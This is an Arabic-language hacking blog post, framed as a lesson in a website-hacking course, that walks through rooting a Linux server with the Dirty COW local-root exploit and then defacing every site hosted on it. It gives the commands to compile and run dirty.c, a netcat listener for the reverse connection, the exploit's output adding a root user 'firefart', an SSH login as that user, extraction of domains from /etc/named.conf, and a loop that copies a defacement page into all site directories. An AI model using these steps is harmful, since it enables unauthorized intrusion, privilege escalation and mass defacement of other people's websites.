هكر هكر

آخر الأخبار

جاري التحميل ...

شرح اختراق جميع المواقع التي على السيرفر عبر لوكال روت local root

السلام عليكم  و دائما في دورة اختراق المواقع اليوم معنا اهم شرح في الدورة و هو ترويت السيرفرات و اختراق جميع المواقع التي على السيرفر  و بعد ما شفنا طريقة اختراق جميع المواقع التي على سيرفر وندوز اليوم سوف نتعرف على طريقة اختراق جميع المواقع التي على السيرفر لينكس  طبعا فرق كبير جدا بين سيرفرات الوندوز و سيرفرات اللينكس ف سيرفرات لينكس صعبة جدا في اختراقها و الحصول على صلحيات ال root  للحصول على لوكال مناسب للسيرفر الدي تريد اختراقه سوف اقدم لكم احد الادوات الرائعة و التي تبحث لك على اللوكال المناسب للسيرفر بدون اي تدخل منك  و هادا شرح لها  و بعد ان تجد لوكال مناسب للسيرفر  دائما ما يكون اللوكل ب سيغة c مثال  local.c 
في بعض اللوكلات تجد طريقة ترجمة اللوكال و ادا لم تجده ف كل ما عليك فعله هو ان تقوم ب هده الترجمة  
gcc local.c -o local 
في بعض السيرفات و التي لا تكون لك فيها صلحيات لا يمكنك ان تقوم ب ترجمة الثغرة في السيرفر 
لهادا قم ب ترجمة الثغرة على جهازك 
و بعد ترجمة الثغرة نقوم ب اعطائها الصلاحيات عبر chmod 
chmod +x local  
و بعدها القيام ب عمل تشغيل ل الوكال عبر 
./local 
  في بعض المرات قد يتطلب ان تنتضر نصف ساعة كاملة لاكتمال 
و ادا كان لديك سيرفر من 2016 او تحته فهادا سهل جدا كل ما عليك القيام به هو تحميل هده الثغرة 
بعد تحميلك للثغرة قم ب حفضها ب اسم dirty.c و قم برفعها على السيرفر او قم ب ترجمتها على جهازك  و بعدها قم برفعها و الان قم ب عمل اتصال عكسي على السيرفر 
في بعض الاحيان لن تستطيع الاتصال ب السيرفر من الشل بل تحتاج الى سكربت البيرل او باش و ساشرح هده الطريقة في القريب العاجل المهم نكمل الشرح
قم بعمل اتصال عكسي عبر هادا الامر 
nc -lvp 21
قم ب تغيير البورت 21 الى اي بورت تريده
و كما نرى في الصورة فانه قد تم الاتصال ب السيرفر ب مجاح و الان سوف ندخل الى مجلد الدي يوجد به اللوكال روت 
بعد الاتصال ب السيرفر   قم ب ترجمة الثغرة  عبر هادا الامر 
gcc -pthread dirty.c -o dirty -lcrypt
 و الان سوف نقوم ب اعطائها التصريح عبر امر 
chmod +x dirty 
و كما نرى في الصورة فيانه قد تم ترجمة الثغرة و اعطائها التصاريح و لم يبقى لنا سوى ان نقوم نقوم ب تشغيل الوكال روت 
لتشغيل الثغرة 
./dirty
في حالة ما ضهر لك هادا الخطء الدي في هده الصورة   و معه هده الرسالة 
File /tmp/passwd.bak already exists! Please delete it and run again
فهادا يعني انه قد تم تجربة الثغرة على هادا السيرفر هل هادا يعني لا يمكننا ان نقوم ب ترويته !!! 
لالا سوف نقوم ب حدف ملف /tmp/passwd.bak  عبر هادا الامر 
rm /tmp/passwd.bak
و قم ب اعدة تشغيل الثغرة 
و الان سوف يضهر لك ان تدخل كلمة سر  سوف نختار على سبيل المثال  123456123
و سوف تستغرق هده العملية بعض الوقت من 10 دقائق الى 20 دقيقة 
و كما نرى في الصورة ف انه قد انتهى 
و كما نرى في الرسالة 
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fiT.MfhrH0uoo:0:0:pwned:/root:/bin/bash
mmap: 7fa12ebf1000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 و الان لنعرف انه قد تم اضافة root في السيرفر نقوم ب عرض ملف /etc/passwd عبر هادا الامر 
cat /etc/passwd
كما نرى في الصورة فانه تم اضافة root ب اسم firefart
و الان للدخول الى الروت هناك  ان استطعت نقل ملف /tmp/passwd.bak الى etc/passwd عبر الامر 
mv /tmp/passwd.bak /etc/passwd
 الان  تقوم ب الدخول من الترمنال عبر امر 
su firefart
و هده في الكثير من الاحيان لن تنجح معك كما نرى في الصورة 
و الان سوف نقوم ب التسجيل في ال ssh 
قم ب فتح الترمنال و كتابة هادا الامر 
ssh firefart@127.0.0.1
مع تغيير 127.0.0.1 الى ايبي السيرفر  
كما نرى في الصورة 
و كما نرى ف انه قد تم الاتصال ب ال ssh بكل نجاح طبعا كلمة السر هي 123456123 و الان لنعرف صلحياتنا على السيرفر نقوم ب اعطئه امر id 
و كما نرى في الصورة ف ان صلاحياتنا على السييرفر هي روت و يمكننا ان نقوم ب اي شيء في السيرفر حتى اطفائه و لكن شرحنا اليوم هو اختراق جميع مواقع السيرفر 
في البداية يجب ان نقوم ب ر فع اندكس الاختراق في السيرفر او رفعه في اي موقع و تنزيله عبر امر wget انا سوف ارفع الاندكس من الشل 
و كما نرى ف ان اسم الاندكس هو sa.html 
و المسار هو 
 /home/adoc11/public_html/__/ 
سوف نقوم ب الدخول الى مسار الاندكس عبر امر 
cd  /home/adoc11/public_html/__/ 
من ثم نقل الاندكس الى ملف ال home عبر هادا الامر 
mv index.html /home/
و كما هو موضح في الصورة 
 الدهاب الى ملف ال home و هادا عبر الامر 
cd /home/
و الان سوف نقوم ب سحب ملف ال named.conf و الدي توجد به جميع الدومينات 
امر السحب 
cat /etc/named.conf > dns.txt
 و الان قد تم سحب جميع اسماء النطاقات و وضعها في ملف  اسمه dns.txt و الان سوف نقوم ب الدهب الى هادا الموقع ل استخراج جميع الدومينات 
رابط الموقع اضغط هنا   وبعد ان قمنا ب استخراج جميع الدومينات لم يبقى لنا الى نقل الاندكس الى جميع المواقع التي على السيرفر ب هادا الامر 
for i in $(find . -type d -maxdepth 2); do cp -n sa.html $i/sa.html ; done
مع تغيير sa.html الى اسم الاندكس الخاص بك 
و كما نرى في الصورة قد تم تغغير جميع اندكسات المواقع 
و الان لمشاهدة الشرح ب الفيديو 

عن الكاتب

souhaib naceri صهيب ناصري مدون جزائري أبلغ من العمر 21 سنة أحب مشاركة أفكاري على الانترنت متخصص في مجال التقنية و أمن المعلومات أهدف الى إثراء المحتوى العربي بالمحتوى الحصري فقط!

التعليقات


صور الهكر 

إذا أعجبك المحتوى الذي نقدمه إشترك في قناتنا على اليوتويب لتصلك الشروحات مصورة بالفيديو





اتصل بنا

إذا أعجبك محتوى مدونتنا نتمنى البقاء على تواصل دائم ، فقط قم بإدخال بريدك الإلكتروني للإشتراك في بريد المدونة السريع ليصلك جديد المدونة أولاً بأول ، كما يمكنك إرسال رساله بالضغط على الزر المجاور ...

جميع الحقوق محفوظة

هكر